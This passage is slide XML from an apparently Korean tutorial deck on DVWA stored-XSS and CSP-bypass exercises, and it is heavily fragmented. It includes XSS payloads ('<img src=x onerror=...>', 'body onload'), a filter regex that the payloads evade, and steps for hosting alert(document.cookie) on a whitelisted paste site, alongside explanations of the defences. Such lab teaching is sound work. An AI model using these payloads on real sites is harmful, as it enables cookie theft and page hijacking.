            <a:ext cx="5911200" cy="31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72283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$name =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preg_replace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('/&lt;(.*)s(.*)c(.*)r(.*)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(.*)p(.*)t/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’, '', $name ); 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제목의 내용을 처리하는 부분이 변경되었다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preg_replace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()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함수는 문장 패턴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정규표현식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대체해주는 함수이다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/* $name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즉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제목의 내용중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있다면 공백으로 대체한다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(.*)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사이에 어떤 내용이 와도 포함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(ex. &lt;s[123]c)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대문자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소문자 모두 포함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(ex. &lt;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SCript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*/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앞의 공격코드는 모두 공백으로 처리된다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XSS (Cross-Site Scripting) – Overview and Contexts | SAP Blogs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7FA36A0-1A74-4D41-87E6-47C2D1DD51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 bwMode="auto">
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="59118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91EBC-7407-4140-89DA-B40667C7FD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3725" y="1991997"/>
            <a:ext cx="5911200" cy="318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305CE5-AF65-4A74-A027-06F7AF044E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1991997"/>
            <a:ext cx="5911200" cy="318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31045-DAC1-43E9-A296-A3FF75E53186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="4649462"/>
            <a:ext cx="3227293" cy="270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27679-0F13-488D-9BC5-7826121B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420" y="2699596"/>
            <a:ext cx="4343400" cy="1733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D065D-62BD-4918-86DB-2D2CE8BE1809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033959" y="3050524"/>
            <a:ext cx="3990323" cy="22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80DC0-3616-47D2-94A1-8868E135E5F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2959" y="1979299"/>
            <a:ext cx="5911200" cy="318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1D81C0-9973-47EE-AD7F-368A6987451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0883" y="1979299"/>
            <a:ext cx="5911200" cy="3189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EAAFC2-4D3B-45C8-A417-3E3A315D59F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26691" y="1966598"/>
            <a:ext cx="5911200" cy="318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233F2-EF82-49A0-9DC9-3E45EA62B685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520109" y="3696062"/>
            <a:ext cx="2807067" cy="261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1081900699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하지만 이 방법은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태그를 막아주지만 다른 스크립트 태그를 이용한다면 공격할 수 있는 취약점이다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&lt;body onload=alert(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)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod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img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=x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onerror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=alert(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)&gt;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위의 코드를 제목에 입력하면 공격에 성공한다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공격도 찾아보길 바란다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XSS (Cross-Site Scripting) – Overview and Contexts | SAP Blogs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7FA36A0-1A74-4D41-87E6-47C2D1DD51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 bwMode="auto">
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="59118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91EBC-7407-4140-89DA-B40667C7FD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3725" y="1991997"/>
            <a:ext cx="5911200" cy="318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305CE5-AF65-4A74-A027-06F7AF044E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1991997"/>
            <a:ext cx="5911200" cy="318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31045-DAC1-43E9-A296-A3FF75E53186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="4649462"/>
            <a:ext cx="3227293" cy="270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27679-0F13-488D-9BC5-7826121B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420" y="2699596"/>
            <a:ext cx="4343400" cy="1733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D065D-62BD-4918-86DB-2D2CE8BE1809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033959" y="3050524"/>
            <a:ext cx="3990323" cy="22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80DC0-3616-47D2-94A1-8868E135E5F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2959" y="1979299"/>
            <a:ext cx="5911200" cy="318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1D81C0-9973-47EE-AD7F-368A6987451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0883" y="1979299"/>
            <a:ext cx="5911200" cy="31896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0EAAFC2-4D3B-45C8-A417-3E3A315D59F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26691" y="1966598"/>
            <a:ext cx="5911200" cy="318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233F2-EF82-49A0-9DC9-3E45EA62B685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520109" y="3696062"/>
            <a:ext cx="2807067" cy="2616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1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A610215-A933-4750-A63E-FE610DAA65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2759071"/>
            <a:ext cx="4419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1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(Impossible)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5206998"/>
            <a:ext cx="5913238" cy="4025902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마지막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impossible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뚫지 말라고 만들었기 때문에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소스코드를 보면서 어떻게 방어했는지 분석한다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토큰을 사용해 사용자의 세션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토큰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체크한다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세션 소유자와 요청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메세지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생성자를 비교해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CSRF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공격을 방지한다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제목과 본문 내용 전부 치환함수를 통해 처리한다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스크립트 태그를 사용할 수 없다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XSS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방지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3.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데이터베이스에 저장할 때 데이터를 검사한다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-&gt;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게시판의 내용을 데이터베이스에 저장하기 때문에 마지막으로 데이터 한번 더 검사하여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Injection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방지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3-12) XSS(Stored)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XSS (Cross-Site Scripting) – Overview and Contexts | SAP Blogs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7FA36A0-1A74-4D41-87E6-47C2D1DD515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b="7689"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5911850" cy="318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0791EBC-7407-4140-89DA-B40667C7FDA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3725" y="1991997"/>
            <a:ext cx="5911200" cy="3189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305CE5-AF65-4A74-A027-06F7AF044E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0" y="1991997"/>
            <a:ext cx="5911200" cy="3189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A31045-DAC1-43E9-A296-A3FF75E53186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="4649462"/>
            <a:ext cx="3227293" cy="2700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C27679-0F13-488D-9BC5-7826121B5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420" y="2699596"/>
            <a:ext cx="4343400" cy="17335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6D065D-62BD-4918-86DB-2D2CE8BE1809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033959" y="3050524"/>
            <a:ext cx="3990323" cy="2292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480DC0-3616-47D2-94A1-8868E135E5FF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2959" y="1979299"/>
            <a:ext cx="5911200" cy="31896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E1D81C0-9973-47EE-AD7F-368A6987451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60883" y="1979299"/>
            <a:ext cx="5911200" cy="3189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233F2-EF82-49A0-9DC9-3E45EA62B685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507633" y="3348377"/>
            <a:ext cx="1841868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6F301A-A474-428E-8A4D-FC49293C944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67670" y="1947766"/>
            <a:ext cx="5911200" cy="31896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BAC983-931D-45A7-B998-5609C820317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26691" y="1932273"/>
            <a:ext cx="5911200" cy="3189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B04ACAB-C667-47F8-BB00-447F82613F77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28357" y="1960465"/>
            <a:ext cx="5911200" cy="31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67904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1F23FE49-2C55-4F6E-8C08-28DB8F560A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1508055" y="2547034"/>
            <a:ext cx="6050984" cy="2355847"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram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FF0E964A-EB6F-4800-AB23-3B00F6F0FBEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-670563" y="2547035"/>
            <a:ext cx="2682242" cy="2355847"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 26157"/>
            </a:avLst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36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B05D0FA-6B86-4FD9-A75C-0B4C380BC2DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2152736" y="3048507"/>
            <a:ext cx="4485405" cy="135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CSP Bypass</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR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56077-404F-4463-B750-1318DD5A891E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-109284" y="3309459"/>
            <a:ext cx="26822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582C86-BB01-44F4-8E03-384F048F55D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2834047" y="5217467"/>
            <a:ext cx="35023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1)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개요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2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절차</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2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en-US" altLang="ko-KR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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2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방어 개요</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="28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512801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CSP Bypass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▶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CSP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란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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5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lvl="1" indent="0">
              <a:buNone/>
            </a:pP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XSS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(Cross-site scripting)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injection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 웹 페이지에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악성 스크립트를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삽입하는 공격 기법들을 막기 위해 사용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lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5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342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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기본적인 구현은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Content-Security-Policy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라고 불리는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헤더를 기반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▶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CSP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취약점을 이용한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방식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5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lvl="1" indent="0">
              <a:buNone/>
            </a:pP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CRLF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Injecton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685800" lvl="2" indent="0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흔한 우회 방법 중 하나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685800" lvl="2" indent="0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헤더에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LF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삽입하여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header body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보내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header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정보를 무효화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lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5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lvl="1" indent="0">
              <a:buNone/>
            </a:pP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Response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Header (Status) Modification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="2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header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685800" lvl="2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 Status Code : 200 OK, 500 Internal Server Error,404 Not Found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="2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Status Code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기본말고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다른 아무거나 입력하면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XSS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성공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lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5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endParaRPr lang="en-US" altLang="ko-KR" sz="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lvl="1" indent="0">
              <a:buNone/>
            </a:pP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Adding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 URL or Uploading to a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Valid Server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685800" lvl="2" indent="0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허용된 사이트에 스크립트를 삽입해서 불러오는 방법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685800" lvl="2" indent="0">
              <a:buNone/>
            </a:pP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허용되는 사이트를 추가해주는 방법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54715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CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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지시문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및 옵션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F6587EF-0689-4D3C-9983-1E4B6B7431CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="483842" y="1742437"/>
          <a:ext cx="5890316" cy="772668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44958">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4190820365"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4545358">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="96744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지시문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09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base-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uri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페이지의 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&lt;base&gt; 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요소에 나타날 수 있는 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URI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를 제한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329096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child-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src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작업자와 삽입된 프레임 콘텐츠에 대한 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URI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를 나열한다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7099977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ex) “child-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src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en-US" altLang="ko-KR" sz="1350" u="sng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  <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>https://youtube.com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”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사용하면 유튜브에서 가져온 동영상 삽입 가능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400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connect-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src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(XHR, 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WebSockets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및 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EventSource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를 통해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 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연결할 수 있는 출처를 제한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68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font-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src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웹 글꼴을 제공할 수 있는 출처를 지정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830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form-action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&lt;form&gt; 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태그에서의 제출을 위해 유효한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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엔드포인트를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나열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465910"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="123613">
                <a:tc rowSpan="3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frame-ancestors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현재 페이지를 삽입할 수 있는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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소스를지정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229958"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1735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&lt;frame&gt;, &lt;iframe&gt;, &lt;embed&gt;, &lt;applet&gt; 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태그에 적용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9205878"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1236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&lt;meta&gt; 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태그에는 사용불가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997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img-src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이미지를 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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로드할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수 있는 출처를 정의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639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media-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src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동영상과 오디오를 제공하도록 허용되는 출처를 제한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8888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object-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src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플래시와 기타 플러그인에 대한 제어를 허용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154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plugin-types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페이지가 호출할 수 있는 플러그인의 종류를 제한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8215012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report-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uri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콘텐츠 보안 정책 위반 시 브라우저가 보고서를 보낼 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URL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을 지정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0280838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&lt;meta&gt; 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태그에서는 사용불가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09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style-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src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script-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src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에서 스타일시트에 해당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7573451"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="35433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upgrade-insecure-requests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사용자 에이전트에 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URL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구성표를 다시 작성하여 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HTTP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를 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HTTPS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 변경하도록 지시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592804"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="118110">
                <a:tc rowSpan="3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default-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src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지시문을 지정하여 기본 동작을 재정의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6517564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지정하지 않은 채로 두는 대부분의 지시문에 대한 기본값을 정의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979646"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1181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-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1350" kern="1200" dirty="0" err="1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src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로 끝나는 모든 지시문에 이 사항이 적용</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US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7901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690563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src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옵션 설정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F6587EF-0689-4D3C-9983-1E4B6B7431CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="483842" y="1742437"/>
          <a:ext cx="5890316" cy="20777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44958">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4190820365"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4545358">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="96744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지시문</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="135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6096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none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모든 것을 차단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잠금</a:t>
                      </a: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8329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self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현재 도메인만 허용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7099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unsafe-inline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5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소스코드 내 인라인 자바스크립트 및 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="135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CSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="135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허용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0681983"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="185420">
                <a:tc rowSpan="2"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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/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nonce</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1350" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/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5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인라인 자바스크립트 및 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="135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CSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="135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허용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7830621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5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unsafe-inline</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="135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보다 좀 더 보안이 강화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828796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BE0C184-E72C-4AB5-BF04-B4B8A268ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2136866" y="3906179"/>
            <a:ext cx="428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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="140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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="14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옵션은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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  ’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0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감싸야함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2914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DVWA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AE015D9B-5E6E-4480-A94A-712DFB55A79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localhost/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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dvwa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 접속 후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DVWA Security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탭을 누르고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Low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레벨로 설정 해준다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146826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Security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레벨 선택</a:t>
            </a:r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접속한 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Security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탭을 선택한다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공격할 서버의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Security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레벨을 선택하여 서버의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Security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레벨을 변경한다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Bypass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탭을 눌러 이동한다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45597D5-95B2-4223-9B79-C035079388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09" t="20312" r="15035" b="6627"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968500"/>
            <a:ext cx="5913238" cy="46862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295DB0-C7FD-440D-A859-CB09588CCC42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="5562600"/>
            <a:ext cx="121285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0DA25A-7670-494B-AD9C-C77790939010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="4629150"/>
            <a:ext cx="793750" cy="1041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837080-2A8B-4949-9F03-17C2365FDA70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2698750" y="4629148"/>
            <a:ext cx="615950" cy="25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927807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Low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레벨 서버 소스 코드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컨텐츠 허용 목록에 밑의 주소를 추가해 주어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 적용이 안된다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5"/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https://pastebin.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/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https://hastebin.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/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https://code.jaquery.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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https://ssl.google-analytics.com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문제점 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pastebin.com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hastebin.com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플레인 텍스트를 저장할 수 있는 웹 애플리케이션이다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F74FB05-A85E-44F0-A76B-B8C56DFAF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t="9901" r="11340" b="27930"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968499"/>
            <a:ext cx="5901779" cy="46862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8A210B2-C889-4656-862C-B5A85CCEF494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2184227" y="7494814"/>
            <a:ext cx="2859314" cy="943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5546DA-980E-4B9D-AEF1-B54B5C800D63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795733" y="2254249"/>
            <a:ext cx="5522517" cy="3556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9224398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Medium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레벨 서버 소스 코드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unsafe-inline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nonce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추가해서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Inline JavaScript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금지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8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XSS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감지하면 페이지로드 중지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(0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비활성화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1 :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활성화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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문제점 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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코드에  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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nonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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노출 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="185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되있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="185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185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D16CD5E-BF33-4271-830F-B3228FF870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t="9903" r="11340" b="27929"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="463712" y="1975058"/>
            <a:ext cx="5903975" cy="468629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3357FA2-97C6-472D-91D0-73E590ED162C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188619" y="2436577"/>
            <a:ext cx="3327400" cy="1809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9110A1-3914-40DB-89B9-82D61BDF9DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="810183" y="3193996"/>
            <a:ext cx="2295387" cy="24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11124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High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레벨 서버 소스 코드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Solve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the sum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 간단한 수식을 계산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번 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high.js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파일 참조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문제점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high.js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callback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대한 검증이 이뤄지지 않음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8E1610C4-7275-43CD-A792-96470AF724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t="9903" r="11340" b="27929"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472378" y="1968499"/>
            <a:ext cx="5913237" cy="468629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F8C5B6C-22E3-4C6C-8BCB-F30F7753C6DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793423" y="5219698"/>
            <a:ext cx="2777419" cy="24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126570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high.js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코드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callback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그대로 보여지는 것을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8C5B6C-22E3-4C6C-8BCB-F30F7753C6DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793423" y="5219698"/>
            <a:ext cx="2777419" cy="24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F2B1D1-651E-4AD2-BDA2-E6C465A6C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7" t="26236" r="49273" b="33225"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472378" y="1968494"/>
            <a:ext cx="5913236" cy="468628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8E1685-0A34-4B6A-BF5E-78A2045616A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193800" y="2349948"/>
            <a:ext cx="3505200" cy="24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3285442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Impossible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레벨 서버 소스 코드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 코드는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레벨과 같다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레벨에서 문제였던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jsonp.php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수정해 취약점을 해결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jsonp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호출하지만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callback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사용하지 않고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호출하는 기능을 하드코딩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33FC46E-6CD3-4C16-98D5-0AC57C9F3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t="9903" r="11340" b="27929"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472379" y="1968499"/>
            <a:ext cx="5913237" cy="46862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94046024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Impossible.js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코드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high.js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문제였던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callback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보이지 않게 하드 코딩한 것을 확인할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4FA362E-472F-4BC0-82C1-C7451C5C2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2" t="26382" r="49273" b="38796"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472376" y="1966867"/>
            <a:ext cx="5913237" cy="46862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656E-D727-41B5-9CAC-F2BEC0BC70F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092200" y="2412580"/>
            <a:ext cx="2971800" cy="24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85358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093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Low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①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https://hastebin.com/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접속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3F8540E-3335-467D-949F-C07A87090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8" b="12345"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968500"/>
            <a:ext cx="5901779" cy="46432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87262C-D940-4140-8494-20D854546D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86634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Low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②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쿠키 값을 불러오는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document.cookie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 창으로 띄울 수 있게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alert(document.cookie)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코드를 작성하여 저장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https://hastebin.com/odonotireh.js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링크를 복사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https://hastebin.com/raw/odonotireh.js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변경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5E17B8-380B-4EB0-9CBD-C2E24ADB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7" b="12297"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968502"/>
            <a:ext cx="5901779" cy="46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84763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Low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③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CSP Bypass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탭에서 이전 페이지에서 복사한 링크를 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붙여넣고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include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5E17B8-380B-4EB0-9CBD-C2E24ADB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7" b="12297"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968502"/>
            <a:ext cx="5901779" cy="4643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C07581-8E23-4A69-8BD2-B563053A75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9" r="17400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968502"/>
            <a:ext cx="5901779" cy="464320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A5BB1A-6843-429F-9DE5-9B858073D718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4838699" y="4698162"/>
            <a:ext cx="790576" cy="34345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0494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Burpsuite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E5DA3366-CFBB-4138-A8D4-C98C8AD7837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공격 진행에 앞서 위의 경로로 들어가서 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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burpsuite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 실행 해준다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3179944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Low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④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팝업이 뜨면서 쿠키 값을 호출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5E17B8-380B-4EB0-9CBD-C2E24ADB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7" b="12297"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968502"/>
            <a:ext cx="5901779" cy="46432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27455E-B755-45CE-A71E-148DA1789B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3" r="17385"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472379" y="1968502"/>
            <a:ext cx="5901779" cy="46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30057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Medium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①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스크롤을 내려 하단부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source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클릭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5E17B8-380B-4EB0-9CBD-C2E24ADB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7" b="12297"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968502"/>
            <a:ext cx="5901779" cy="464320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39584D0-7E47-4B13-B421-102B2FD450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r="22672"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="472379" y="1968501"/>
            <a:ext cx="5901779" cy="4643203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A5BB1A-6843-429F-9DE5-9B858073D718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249631" y="5788915"/>
